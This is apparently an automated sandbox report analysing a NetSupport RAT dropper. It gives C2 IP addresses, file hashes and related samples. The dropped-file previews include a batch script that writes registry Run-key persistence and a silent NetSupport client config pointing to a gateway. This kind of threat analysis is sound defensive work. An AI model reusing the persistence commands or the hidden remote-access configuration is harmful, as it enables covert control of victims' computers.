                                                                  http://%s/fakeurl.htmfile.exe, 00000000.00000003.2145215251.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2146640720.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144886227.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    45.61.128.74
                                                                    unknownUnited States
                                                                    9009M247GBtrue
                                                                    104.26.0.231
                                                                    geo.netsupportsoftware.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1562378
                                                                    Start date and time:2024-11-25 15:09:24 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 10s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Run name:Run with higher sleep bypass
                                                                    Number of analysed new started processes analysed:16
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal96.rans.evad.winEXE@20/13@1/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 83%
                                                                    • Number of executed functions: 172
                                                                    • Number of non-executed functions: 92
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • VT rate limit hit for: file.exe
                                                                    TimeTypeDescription
                                                                    15:10:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
                                                                    15:10:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
                                                                    15:10:37AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    45.61.128.74file.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • http://45.61.128.74/fakeurl.htm
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • http://45.61.128.74/fakeurl.htm
                                                                    104.26.0.231Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • geo.netsupportsoftware.com/location/loca.asp
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    geo.netsupportsoftware.comPyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.1.231
                                                                    Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.0.231
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.0.231
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.0.231
                                                                    KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                    • 104.26.0.231
                                                                    KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                    • 104.26.0.231
                                                                    72BF1aHUKl.msiGet hashmaliciousNetSupport RATBrowse
                                                                    • 172.67.68.212
                                                                    hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.0.231
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                    • 104.26.1.231
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    M247GBla.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                    • 93.120.123.217
                                                                    loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                    • 104.224.90.41
                                                                    comprobante.exeGet hashmaliciousRemcosBrowse
                                                                    • 176.10.80.43
                                                                    7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                    • 95.174.64.138
                                                                    fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                    • 95.174.66.19
                                                                    7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                    • 193.29.107.181
                                                                    fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                                                                    • 217.138.199.203
                                                                    arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 192.230.38.194
                                                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 38.202.249.45
                                                                    CLOUDFLARENETUShttp://sharefileonline.comGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 172.67.155.47
                                                                    7qsPAygCOx.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.1.182
                                                                    jbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    DGTCkacbSz.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.129.178
                                                                    idk_1.ps1Get hashmaliciousUnknownBrowse
                                                                    • 172.67.129.178
                                                                    FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                                    • 172.67.129.178
                                                                    No context
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\Public\Netstat\HTCTL32.DLLfile.exeGet hashmaliciousNetSupport RATBrowse
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                        KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                          KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                            file.exeGet hashmaliciousNetSupport RATBrowse
                                                                              file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                  CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                    CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):328056
                                                                                      Entropy (8bit):6.754723001562745
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                      MD5:2D3B207C8A48148296156E5725426C7F
                                                                                      SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                      SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                      SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                      • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):257
                                                                                      Entropy (8bit):5.119720931145611
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                      MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                      SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                      SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                      SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                      Malicious:false
                                                                                      Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18808
                                                                                      Entropy (8bit):6.22028391196942
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                      MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                      SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                      SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                      SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):3735416
                                                                                      Entropy (8bit):6.525042992590476
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                      MD5:00587238D16012152C2E951A087F2CC9
                                                                                      SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                      SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                      SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):396664
                                                                                      Entropy (8bit):6.809064783360712
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                      MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                      SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                      SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                      SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):700
                                                                                      Entropy (8bit):5.533099732210104
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Wrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuZIAlkz6:mqzEmPZly6YBlLoG1fXXfDioIAaz6
                                                                                      MD5:5778ABD7CF2E8039239CD5982281D61A
                                                                                      SHA1:9AA6E80A115343A100031C9473FC6A071EEFD07E
                                                                                      SHA-256:0BD4DC8B66C588F715B117021EF14C959E396F5CC6041F885F0D121401BC267A
                                                                                      SHA-512:DC01567D881D48554732747A286AC9A95EF095B4CB860F384B85636B160778C9EFE366F53550B74D9DDF504B293F03BBB252E5247F03490E4567AD142DEF6E0A
                                                                                      Malicious:false
                                                                                      Preview:0x289612fe....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.61.128.74:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):773968
                                                                                      Entropy (8bit):6.901559811406837
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                      MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                      SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                      SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                      SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):519
                                                                                      Entropy (8bit):5.1565107291104475
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:HVj0Kprgidqu1M+Vj0Kprgidqu1oOrvuprgidqu1kprgidqu1oOC:HVyINVyI4cIjI4T
                                                                                      MD5:B50D05F1710CD8674DB0AE8207722DD0
                                                                                      SHA1:9896143256FB62F915EA41D8001AD10BC66D99BB
                                                                                      SHA-256:F4A4726FDF39D43807ED2786BB9B2F881C8C7C8B666E14A96F7B2239C7A4BEDD
                                                                                      SHA-512:3D57684675904055EA3BAAE6E343F5B5A068104EBF97EDFA28687A18855B3F5173847B9283C704636A457B434CA3ACB9D27A4075ECBCD1E5F6A2735B1E444D04
                                                                                      Malicious:true
                                                                                      Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..start %Public%\Netstat\shv.exe..REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..start %Public%\Netstat\shv.exe
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):4.93007757242403
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                      MD5:26E28C01461F7E65C402BDF09923D435
                                                                                      SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                      SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                      SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                      Malicious:false
                                                                                      Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33144
                                                                                      Entropy (8bit):6.737780491933496
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                      MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                      SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                      SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                      SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):77224
                                                                                      Entropy (8bit):6.793971095882093
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                      MD5:325B65F171513086438952A152A747C4
                                                                                      SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                      SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                      SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):105848
                                                                                      Entropy (8bit):4.68250265552195
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                      MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                      SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                      SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\shv.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\Public\Netstat\shv.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):16
                                                                                      Entropy (8bit):3.077819531114783
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:llD:b
                                                                                      MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                                      SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                                      SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                                      SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                                      Malicious:false
                                                                                      Preview:40.7357,-74.1724
                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Entropy (8bit):7.881035102524664
                                                                                      TrID:
                                                                                      • Win64 Executable GUI (202006/5) 92.65%
